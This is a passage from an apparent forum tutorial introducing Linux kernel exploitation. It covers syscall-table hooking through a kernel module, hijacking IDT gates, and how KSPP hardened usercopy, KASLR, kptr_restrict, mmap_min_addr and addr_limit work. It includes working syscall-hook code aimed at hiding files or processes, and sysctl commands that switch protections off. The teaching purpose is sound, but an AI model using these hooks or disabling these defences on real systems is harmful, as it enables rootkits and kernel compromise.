    pmd = pmd_offset(pud, address);
    if (pmd_none(*pmd))
        return NULL;

    *level = PG_LEVEL_2M;
    if (pmd_large(*pmd) || !pmd_present(*pmd))
        return (pte_t *)pmd;

    *level = PG_LEVEL_4K;

    return pte_offset_kernel(pmd, address);
}

So the ioctl handler of the second variant looks like this:

long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){
    unsigned int level;
    pte_t *pte = lookup_address(*address, &level);
    switch(cmd){
        case ioctl_enable:
            printk(KERN_INFO "Enabling hook!");
            pte->pte |= _PAGE_RW;
            sys_call_table[__NR_getuid] = hooked_getuid;
            pte->pte &= ~_PAGE_RW;
            printk(KERN_INFO "Successfully changed!");
            return 0;
        case ioctl_disable:
            printk(KERN_INFO "Disabling hook!");
            pte->pte |= _PAGE_RW;
            sys_call_table[__NR_getuid] = real_getuid;
            pte->pte &= ~_PAGE_RW;
            printk(KERN_INFO "Successfully restored!");
            return 0;
        default:
            return -EINVAL;
    }
}

(Note that these are only examples. Usually the replacement should take place at init and the original should be restored at exit, and the definitions of both the hook and the original handler should carry asmlinkage (arguments passed on the stack, unlike the default fastcall convention, which uses registers); since the syscall here takes no arguments, this was ignored.)

By running an application from userspace that interacts with /dev/hookcontrol (enabling the hook and disabling it after a while) and taking a look at dmesg, the printk() lines from hooked_getuid() show up for every process that calls getuid().

This can be used to add a layer on top of a syscall and to prevent or manipulate its return value: kill to prevent a process from being killed, getdents to hide some files, unlink to prevent a file from being deleted, et cetera. And it doesn't stop here: even without syscall hooking, one can play with processes (hide them, for example) through task_struct fields and per-task flags, or change the file_operations in some specific struct, and many other possibilities.

IDT (Interrupt Descriptor Table):

This table exists in order to handle exceptions; by linking a specific handler to each exception vector, it deals with exceptions raised from userspace (a transition to ring zero is required first) as well as from kernelspace. It is first initialized during early setup, which can be seen in setup_arch(): it calls multiple functions, some of which set up the IDT; the most important one to us is idt_setup_traps():

void __init idt_setup_traps(void)
{
    idt_setup_from_table(idt_table, def_idts, ARRAY_SIZE(def_idts), true);
}

It makes use of the default IDT entries array (def_idts).
static const __initconst struct idt_data def_idts[] = {
    INTG(X86_TRAP_DE,        divide_error),
    INTG(X86_TRAP_NMI,       nmi),
    INTG(X86_TRAP_BR,        bounds),
    INTG(X86_TRAP_UD,        invalid_op),
    INTG(X86_TRAP_NM,        device_not_available),
    INTG(X86_TRAP_OLD_MF,    coprocessor_segment_overrun),
    INTG(X86_TRAP_TS,        invalid_TSS),
    INTG(X86_TRAP_NP,        segment_not_present),
    INTG(X86_TRAP_SS,        stack_segment),
    INTG(X86_TRAP_GP,        general_protection),
    INTG(X86_TRAP_SPURIOUS,  spurious_interrupt_bug),
    INTG(X86_TRAP_MF,        coprocessor_error),
    INTG(X86_TRAP_AC,        alignment_check),
    INTG(X86_TRAP_XF,        simd_coprocessor_error),

#ifdef CONFIG_X86_32
    TSKG(X86_TRAP_DF,        GDT_ENTRY_DOUBLEFAULT_TSS),
#else
    INTG(X86_TRAP_DF,        double_fault),
#endif
    INTG(X86_TRAP_DB,        debug),

#ifdef CONFIG_X86_MCE
    INTG(X86_TRAP_MC,        &machine_check),
#endif

    SYSG(X86_TRAP_OF,        overflow),
#if defined(CONFIG_IA32_EMULATION)
    SYSG(IA32_SYSCALL_VECTOR, entry_INT80_compat),
#elif defined(CONFIG_X86_32)
    SYSG(IA32_SYSCALL_VECTOR, entry_INT80_32),
#endif
};

On x86_32, as an example, when an int $0x80 is raised, the following happens:

static __always_inline void do_syscall_32_irqs_on(struct pt_regs *regs)
{
    struct thread_info *ti = current_thread_info();
    unsigned int nr = (unsigned int)regs->orig_ax;

#ifdef CONFIG_IA32_EMULATION
    ti->status |= TS_COMPAT;
#endif

    if (READ_ONCE(ti->flags) & _TIF_WORK_SYSCALL_ENTRY) {
        nr = syscall_trace_enter(regs);
    }

    if (likely(nr < IA32_NR_syscalls)) {
        nr = array_index_nospec(nr, IA32_NR_syscalls);
#ifdef CONFIG_IA32_EMULATION
        regs->ax = ia32_sys_call_table[nr](regs);
#else
        regs->ax = ia32_sys_call_table[nr](
            (unsigned int)regs->bx, (unsigned int)regs->cx,
            (unsigned int)regs->dx, (unsigned int)regs->si,
            (unsigned int)regs->di, (unsigned int)regs->bp);
#endif
    }

    syscall_return_slowpath(regs);
}

__visible void do_int80_syscall_32(struct pt_regs *regs)
{
    enter_from_user_mode();
    local_irq_enable();
    do_syscall_32_irqs_on(regs);
}

It calls enter_from_user_mode(), then enables interrupt requests (IRQs) on the current CPU, reads the syscall number from the saved registers (orig_ax, i.e. EAX at the time of the int) and uses it as an index into the ia32_sys_call_table array. Arguments are passed to the handler in registers, in the following order: EBX, ECX, EDX, ESI, EDI, EBP.

However, the first entry in idt_table is X86_TRAP_DE (divide error). This can be seen from GDB: the first gate within idt_table holds offset_high, offset_middle and offset_low referencing divide_error, which deals with division-by-zero exceptions.

(gdb) p idt_table
$1 = 0xffffffff82598000 <idt_table>
(gdb) p/x *(idt_table + 0x10*0)
$2 = {offset_low = 0xb90, segment = 0x10, bits = {ist = 0x0, zero = 0, type = 14, dpl = 0, p = 1}, offset_middle = 0x8180, offset_high = 0xffffffff, reserved = 0x0}
(gdb) x/8i 0xffffffff81800b90
   0xffffffff81800b90 <divide_error>:     nopl   (%rax)
   0xffffffff81800b93 <divide_error+3>:   pushq  $0xffffffffffffffff
   0xffffffff81800b95 <divide_error+5>:   callq  0xffffffff81801210 <error_entry>
   0xffffffff81800b9a <divide_error+10>:  mov    %rsp,%rdi
   0xffffffff81800b9d <divide_error+13>:  xor    %esi,%esi
   0xffffffff81800b9f <divide_error+15>:  callq  0xffffffff81025d60 <do_divide_error>
   0xffffffff81800ba4 <divide_error+20>:  jmpq   0xffffffff81801310 <error_exit>

You can see that its DPL is zero; that is, an int $0x00 from a userland process wouldn't reach it (unlike int $0x03, int $0x04 or int $0x80).
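That DPL difference is easy to observe from userspace. Below is a minimal sketch (assuming an x86_64 kernel built with CONFIG_IA32_EMULATION, so that the int $0x80 gate from def_idts above is present): int $0x80 is a system gate (DPL 3) and returns normally, while int $0x00 targets the DPL-0 divide_error gate, so the CPU raises a general protection fault and the kernel delivers SIGSEGV to the process:

#include <stdio.h>
#include <signal.h>
#include <setjmp.h>

static sigjmp_buf jb;

/* int $0x00 from ring 3 hits a DPL-0 gate -> #GP -> SIGSEGV */
static void on_sigsegv(int sig){
    (void)sig;
    siglongjmp(jb, 1);
}

int main(void){
    long ret;

    /* int $0x80 goes through the compat table; eax = 20 is getpid in the i386 ABI */
    asm volatile("int $0x80" : "=a"(ret) : "a"(20) : "memory");
    printf("int $0x80 getpid returned: %ld\n", ret);

    signal(SIGSEGV, on_sigsegv);
    if (sigsetjmp(jb, 1) == 0) {
        asm volatile("int $0x00");  /* DPL 0: not reachable from userspace */
        printf("int $0x00 was allowed?!\n");
    } else {
        printf("int $0x00 raised SIGSEGV, as expected\n");
    }
    return 0;
}

In other words, the DPL in the gate descriptor decides which software interrupts a ring-3 process may raise directly; everything else only triggers when the CPU itself detects the condition.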
Gate descriptors are initialized in idt_setup_from_table(), which calls idt_init_desc():

static void
idt_setup_from_table(gate_desc *idt, const struct idt_data *t, int size, bool sys)
{
    gate_desc desc;

    for (; size > 0; t++, size--) {
        idt_init_desc(&desc, t);
        write_idt_entry(idt, t->vector, &desc);
        if (sys)
            set_bit(t->vector, system_vectors);
    }
}

And here it is:

static inline void idt_init_desc(gate_desc *gate, const struct idt_data *d)
{
    unsigned long addr = (unsigned long) d->addr;

    gate->offset_low    = (u16) addr;
    gate->segment       = (u16) d->segment;
    gate->bits          = d->bits;
    gate->offset_middle = (u16) (addr >> 16);
#ifdef CONFIG_X86_64
    gate->offset_high   = (u32) (addr >> 32);
    gate->reserved      = 0;
#endif
}

This could be used by an attacker, for example by getting the IDT address with the SIDT instruction and locating a specific handler in the table: since offset_high is 0xffffffff for these handlers, incrementing it wraps it around to 0, which moves the handler address below the kernel range.

"As we said above, we're going to use the IDT and overwrite one of its entries (more precisely a Trap Gate, so that we're able to hijack an exception handler and redirect the code-flow towards userspace). Each IDT entry is 64-bit (8-bytes) long and we want to overflow the 'base_offset' value of it, to be able to modify the MSB of the exception handler routine address and thus redirect it below PAGE_OFFSET (0xc0000000) value." ~ Phrack

KSPP:

This protection appeared starting from kernel 4.8; the name is short for "Kernel Self-Protection Project". The relevant feature here is hardened usercopy: it provides additional checks on copy_to_user() and copy_from_user() to prevent classic buffer-overflow bugs, by checking the compile-time buffer size and making sure the requested copy fits; if not, the copy is aborted, preventing any possible exploitation.

root@Nwwz:~/mod# cd /usr/src
root@Nwwz:/usr/src# cd linux-4.17.2
root@Nwwz:/usr/src/linux-4.17.2# cd include
root@Nwwz:/usr/src/linux-4.17.2/include# nano uaccess.h

We can directly see a check that is likely() to pass before the copy operation proceeds:

static __always_inline unsigned long __must_check
copy_from_user(void *to, const void __user *from, unsigned long n)
{
    if (likely(check_copy_size(to, n, false)))
        n = _copy_from_user(to, from, n);
    return n;
}

static __always_inline unsigned long __must_check
copy_to_user(void __user *to, const void *from, unsigned long n)
{
    if (likely(check_copy_size(from, n, true)))
        n = _copy_to_user(to, from, n);
    return n;
}

The check function is as follows: it first compares the compile-time object size against the requested size. If an overflow looks possible, it reports it (copy_overflow() when the requested size isn't a compile-time constant, otherwise __bad_copy_from() or __bad_copy_to() depending on the is_source boolean) and returns false. Otherwise it calls check_object_size() and returns true.

extern void __compiletime_error("copy source size is too small")
__bad_copy_from(void);
extern void __compiletime_error("copy destination size is too small")
__bad_copy_to(void);

static inline void copy_overflow(int size, unsigned long count)
{
    WARN(1, "Buffer overflow detected (%d < %lu)!\n", size, count);
}

static __always_inline bool
check_copy_size(const void *addr, size_t bytes, bool is_source)
{
    int sz = __compiletime_object_size(addr);
    if (unlikely(sz >= 0 && sz < bytes)) {
        if (!__builtin_constant_p(bytes))
            copy_overflow(sz, bytes);
        else if (is_source)
            __bad_copy_from();
        else
            __bad_copy_to();
        return false;
    }
    check_object_size(addr, bytes, is_source);
    return true;
}

check_object_size() itself is simply a wrapper around __check_object_size().
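To watch these checks fire at runtime, here is a minimal sketch of a module (the /proc entry name and the 16-byte size are made up for illustration; CONFIG_HARDENED_USERCOPY=y is assumed, as on the 4.17 build used here). It copies however many bytes userspace writes into a 16-byte slab object, so the size is not a compile-time constant and only the runtime check can catch an oversized write:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/uaccess.h>
#include <linux/slab.h>

/* hypothetical name, for illustration only */
#define PROC_NAME "usercopy_demo"

static ssize_t demo_write(struct file *file, const char __user *ubuf,
                          size_t count, loff_t *ppos)
{
    char *obj = kmalloc(16, GFP_KERNEL);   /* 16-byte slab object */

    if (!obj)
        return -ENOMEM;

    /*
     * count comes from userspace, so it is not a compile-time constant:
     * check_copy_size() cannot reject it, but __check_object_size() ->
     * check_heap_object() sees that the copy spills past the slab object.
     */
    if (copy_from_user(obj, ubuf, count)) {
        kfree(obj);
        return -EFAULT;
    }

    kfree(obj);
    return count;
}

static const struct file_operations demo_fops = {
    .owner = THIS_MODULE,
    .write = demo_write,
};

static int __init demo_init(void)
{
    if (!proc_create(PROC_NAME, 0222, NULL, &demo_fops))
        return -ENOMEM;
    return 0;
}

static void __exit demo_exit(void)
{
    remove_proc_entry(PROC_NAME, NULL);
}

MODULE_LICENSE("GPL");
module_init(demo_init);
module_exit(demo_exit);

A short write (e.g. echo hi > /proc/usercopy_demo) goes through, while something like dd if=/dev/zero of=/proc/usercopy_demo bs=64 count=1 should be rejected by the heap-object check: the writing task is killed and dmesg shows a usercopy report instead of a silent slab overflow (the exact behaviour also depends on the usercopy_fallback setting of the kernel).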
Here is the wrapper, followed by the real check:

#ifdef CONFIG_HARDENED_USERCOPY
extern void __check_object_size(const void *ptr, unsigned long n,
                                bool to_user);

static __always_inline void check_object_size(const void *ptr, unsigned long n,
                                              bool to_user)
{
    if (!__builtin_constant_p(n))
        __check_object_size(ptr, n, to_user);
}
#else
static inline void check_object_size(const void *ptr, unsigned long n,
                                     bool to_user)
{ }
#endif

Additional checks are performed in __check_object_size(): the object must not be a kernel .text address, must not be a bogus address, and must be a safe heap or stack object.

void __check_object_size(const void *ptr, unsigned long n, bool to_user)
{
    if (static_branch_unlikely(&bypass_usercopy_checks))
        return;

    if (!n)
        return;

    check_bogus_address((const unsigned long)ptr, n, to_user);

    check_heap_object(ptr, n, to_user);

    switch (check_stack_object(ptr, n)) {
    case NOT_STACK:
        break;
    case GOOD_FRAME:
    case GOOD_STACK:
        return;
    default:
        usercopy_abort("process stack", NULL, to_user, 0, n);
    }

    check_kernel_text_object((const unsigned long)ptr, n, to_user);
}
EXPORT_SYMBOL(__check_object_size);

With this, it provides enough to block classic buffer-overflow bugs; it can be disabled by commenting out the check and recompiling the kernel (or by building without CONFIG_HARDENED_USERCOPY).

KASLR:

Stands for Kernel Address Space Layout Randomization. It's similar to ASLR in userspace, which keeps the stack and heap addresses from being at the same location in two different runs (unless the attacker gets lucky), and to PIE, since it targets the main binary segments: text, data and bss. This protection randomizes the kernel segments (exception table, text, data...) at each boot; we previously disabled it by putting nokaslr on the kernel command line. In order to experiment with it, nokaslr was removed and specific symbols in /proc/kallsyms were fetched on two different runs (output omitted here).

Comparing the runs shows that addresses are randomly assigned at boot time to _stext and _sdata, whereas their end is just the start address plus a size that doesn't change (0x21dc0 for .data, 0x6184d1 for .text in this case); note that .data sits at a constant distance from .text. So if the attacker gets the .text base address (the result of a leak), he can locate all the kernel symbols even with no access to kallsyms, using RVAs (offsets), but he'll have to compile the target kernel on his own box to obtain them. This is used, for example, when SMEP is on and one has to go for ROP to disable it first, and only then redirect execution to a shellcode placed in userspace (< TASK_SIZE).

kptr_restrict:

This protection prevents kernel addresses from being exposed to the attacker. It stops the %pK format from dumping an address, and its behaviour depends on the kptr_restrict value (0, 1 or 2).

Kernel Pointers:
    %pK    0x01234567 or 0x0123456789abcdef
    For printing kernel pointers which should be hidden from unprivileged
    users. The behaviour of %pK depends on the kptr_restrict sysctl - see
    Documentation/sysctl/kernel.txt for more details.

This can be seen in kprobe_blacklist_seq_show(), which performs a check with a call to kallsyms_show_value(); depending on the result, it does or does not print the start and end addresses.
static int kprobe_blacklist_seq_show(struct seq_file *m, void *v)
{
    struct kprobe_blacklist_entry *ent =
        list_entry(v, struct kprobe_blacklist_entry, list);

    if (!kallsyms_show_value())
        seq_printf(m, "0x%px-0x%px\t%ps\n", NULL, NULL,
                   (void *)ent->start_addr);
    else
        seq_printf(m, "0x%px-0x%px\t%ps\n", (void *)ent->start_addr,
                   (void *)ent->end_addr, (void *)ent->start_addr);
    return 0;
}

What kallsyms_show_value() does is shown here:

int kallsyms_show_value(void)
{
    switch (kptr_restrict) {
    case 0:
        if (kallsyms_for_perf())
            return 1;
    case 1:
        if (has_capability_noaudit(current, CAP_SYSLOG))
            return 1;
    default:
        return 0;
    }
}

If the kptr_restrict value is 0, it calls kallsyms_for_perf() to check whether sysctl_perf_event_paranoid is smaller than or equal to 1, and returns 1 if so. If the value is 1, it checks whether CAP_SYSLOG is within the user's capabilities and returns 1 if true. Otherwise, it returns 0.

Disabling this protection can be done by setting the content of /proc/sys/kernel/kptr_restrict to 0, or by using sysctl:

sysctl -w kernel.kptr_restrict=0

But watch out for perf_event_paranoid too: if it's > 1, it also needs to be adjusted. This is an example on the default kernel run by my Debian VM:

user@Nwwz:~$ cd /proc/self
user@Nwwz:/proc/self$ cat stack
[<ffffffff81e7c869>] do_wait+0x1c9/0x240
[<ffffffff81e7d9ab>] SyS_wait4+0x7b/0xf0
[<ffffffff81e7b550>] task_stopped_code+0x50/0x50
[<ffffffff81e03b7d>] do_syscall_64+0x8d/0xf0
[<ffffffff8241244e>] entry_SYSCALL_64_after_swapgs+0x58/0xc6
[<ffffffffffffffff>] 0xffffffffffffffff

However, on the 4.17 kernel we get this, because of perf_event_paranoid:

root@Nwwz:~# cd /proc/self
root@Nwwz:/proc/self# cat stack
[<0>] do_wait+0x1c9/0x240
[<0>] kernel_wait4+0x8d/0x140
[<0>] __do_sys_wait4+0x95/0xa0
[<0>] do_syscall_64+0x55/0x100
[<0>] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[<0>] 0xffffffffffffffff
root@Nwwz:/proc/self# cat /proc/sys/kernel/kptr_restrict
0
root@Nwwz:/proc/self# cat /proc/sys/kernel/perf_event_paranoid
2

mmap_min_addr:

The mm_struct within the task_struct holds an operation function pointer called get_unmapped_area.

struct mm_struct {
    ...
#ifdef CONFIG_MMU
    unsigned long (*get_unmapped_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
#endif
    ...
}

It is extracted in get_unmapped_area(), which tries to take it from the mm (mm_struct) before checking the file and its file_operations, or whether the mapping has the MAP_SHARED flag, in which case shmem_get_unmapped_area() is used instead. Within the mm_struct, however, the default value of get_unmapped_area is the arch-specific function. That function searches for a large enough memory block to satisfy the request, but before returning the address it checks that it is greater than or equal to mmap_min_addr, which means that any address below it will not be handed out. This prevents NULL-pointer-dereference attacks from being exploitable (no mmapping of the NULL address, so nothing can be stored there: shellcode, pointers...).

Disabling this protection can be done by setting the content of /proc/sys/vm/mmap_min_addr to 0, or by using sysctl like before:

sysctl -w vm.mmap_min_addr=0

addr_limit:

The thread (thread_struct) within the task_struct contains some important fields; amongst them is addr_limit.

typedef struct {
    unsigned long    seg;
} mm_segment_t;

struct thread_struct {
    ...
    mm_segment_t    addr_limit;

    unsigned int    sig_on_uaccess_err:1;
    unsigned int    uaccess_err:1;
    ...
};

This can be read with a call to get_fs() and changed with set_fs():

#define MAKE_MM_SEG(s)  ((mm_segment_t) { (s) })
#define KERNEL_DS       MAKE_MM_SEG(-1UL)
#define USER_DS         MAKE_MM_SEG(TASK_SIZE_MAX)

#define get_ds()        (KERNEL_DS)
#define get_fs()        (current->thread.addr_limit)
static inline void set_fs(mm_segment_t fs)
{
    current->thread.addr_limit = fs;
    set_thread_flag(TIF_FSCHECK);
}

When a userspace-supplied address is about to be accessed, it is checked against this limit first, so overwriting it with -1UL (KERNEL_DS) would let you read or write kernelspace.

This was the introduction. I've noticed that it has grown bigger than I expected, so I stopped and removed the parts about other protections, side-channel attacks and more.

Starting this was possible thanks to: @_py (DA BEST), @pry0cc, @Evalion, @4w1il, @ricksanchez and @Leeky.

See y'all in part 1, peace.

"nothing is enough, search more to learn more" ~ exploit

Source: https://0x00sec.org/t/point-of-no-c3-linux-kernel-exploitation-part-0/11585
    1 point